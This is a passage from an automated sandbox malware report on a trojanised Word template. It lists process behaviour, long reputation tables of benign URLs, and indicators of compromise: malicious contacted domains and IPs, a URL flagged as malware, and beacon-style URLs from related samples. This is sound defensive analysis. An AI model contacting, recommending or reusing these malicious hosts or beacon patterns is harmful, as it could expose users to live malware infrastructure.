          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          www.scott-re.online/nnmd/100%Avira URL Cloudmalware
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          k9cdna.51w4.com
          		45.142.156.44
          		truetrueunknown
          www.likehowto.com
          		203.76.236.103
          		truetrueunknown
          www.xpddwrfj.icu
          		unknown
          		unknowntrue
            		unknown
            www.pjsgsc.com
            		unknown
            		unknowntrue
              		unknown
              www.hcr.services
              		unknown
              		unknowntrue
                		unknown
                www.7985699.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.scott-re.online/nnmd/true
                  • Avira URL Cloud: malware
                  		low

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://search.ebay.de/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mtv.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.rambler.ru/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmpfalse
                                		high
                                http://buscar.ya.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2095285782.0000000004B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://asp.usatoday.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://rover.ebay.comexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://search.ebay.in/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://%s.comexplorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		low
                                                  http://msk.afisha.ru/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://search.rediff.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://search.naver.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://www.google.ru/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.msn.com/?ocid=iehplexplorer.exe, 00000006.00000000.2094118095.00000000039F4000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://search.daum.net/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://buscar.ozu.es/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://search.about.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.2102194085.000000000856E000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.ask.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.cjmall.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://search.centrum.cz/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://suche.t-online.de/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.google.it/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://search.auction.co.kr/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.ceneo.pl/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://www.amazon.de/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2101707884.000000000839A000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://sads.myspace.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://search.sify.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://search.ebay.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://search.nifty.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.google.si/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.google.cz/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.soso.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.univision.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://search.ebay.it/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://busca.orange.es/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2104512948.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.tesco.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://search.interpark.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://investor.msn.com/explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://search.espn.go.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://service2.bfast.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      45.142.156.44
                                                                                                                                                      		k9cdna.51w4.comUnited Kingdom
                                                                                                                                                      		40065CNSERVERSUStrue
                                                                                                                                                      23.95.122.24
                                                                                                                                                      		unknownUnited States
                                                                                                                                                      		36352AS-COLOCROSSINGUSfalse
                                                                                                                                                      203.76.236.103
                                                                                                                                                      		www.likehowto.comHong Kong
                                                                                                                                                      		26658HENGTONG-IDC-LLCUStrue

                                                                                                                                                      Private

                                                                                                                                                      IP
                                                                                                                                                      192.168.2.22
                                                                                                                                                      192.168.2.255

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                      Analysis ID:383958
                                                                                                                                                      Start date:08.04.2021
                                                                                                                                                      Start time:13:08:18
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 10m 23s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:dot.dot
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                      Number of analysed new started processes analysed:12
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.expl.evad.winDOT@10/8@8/5
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 30.3% (good quality ratio 28.7%)
                                                                                                                                                      • Quality average: 68.8%
                                                                                                                                                      • Quality standard deviation: 29.6%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 95%
                                                                                                                                                      • Number of executed functions: 81
                                                                                                                                                      • Number of non-executed functions: 33
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .dot
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Active ActiveX Object
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      13:08:37API Interceptor243x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                      13:08:41API Interceptor34x Sleep call for process: vbc.exe modified
                                                                                                                                                      13:08:56API Interceptor158x Sleep call for process: NAPSTAT.EXE modified
                                                                                                                                                      13:10:01API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      45.142.156.44SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • www.6927199.com/a6ru/?9rT=ablpdH&DvRxvP=NhNiaHOKHVQfGN0YY99wJ58IE9WzqrmHm9WDer2yilaxrU8do+EbPhhYqdlctrzvHxzu
                                                                                                                                                      Scan-45679.exeGet hashmaliciousBrowse
                                                                                                                                                      • www.3931799.com/gwam/?Bjq=WBcASaJCttsXosCQsrWbmBSs+tmmydGShEGHgXg6pwkkYqVCVVlIvyOdwkU76G9CTRE5&Efzxz2=2dut_L3xNbOxThN
                                                                                                                                                      Y79FTQtEqG.exeGet hashmaliciousBrowse
                                                                                                                                                      • www.5915599.com/aqu2/?8pdLW0th=Qu/SGATjsPLgbnfzlQH1K+vXdQVupUmj3KBmHQS03Fh4PQTCkmmYvz8b7ifPJvghEbQA&axo=tVBlCVNXaRgL
                                                                                                                                                      MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                                                                      • www.6987599.com/rrrq/?Qtu=0vETm3tpTz/JBz7myerFMJmtxuQinZwH/yTouEotDJa3Xdwt/k/0k/t75VQdQCQAjPnK&D8Lt7=AbilnzdhCdPTRfM
                                                                                                                                                      shipping document008476_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • www.5996399.com/xgxp/?Dxlpd=cJE0&Ybcx-VVp=Xu1DQjTJJhmglDyHbFvDt9q0tpf8gcpJJQnfBxbnS7whiZxllJdbVZRKcXEP+d7oIOuv
                                                                                                                                                      Swift_Payment_jpeg.exeGet hashmaliciousBrowse
                                                                                                                                                      • www.3991799.com/09rb/?t8bL=mtOT66Wi3D6giMtbRcSTtfK33xC0G/9sULI8vKPJ3WYoXH3DAPX23CnZiOHbu4P1xNSn&2d=llsp
                                                                                                                                                      IRS_Microsoft_Excel_Document_xls.jarGet hashmaliciousBrowse
                                                                                                                                                      • www.3991799.com/09rb/?Qzr=mtOT66Wi3D6giMtbRcSTtfK33xC0G/9sULI8vKPJ3WYoXH3DAPX23CnZiOHxxI/11Pan&uZUX=MXEXxL

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      k9cdna.51w4.comSwiftMT103_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      Scan-45679.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      Y79FTQtEqG.exeGet hashmaliciousBrowse
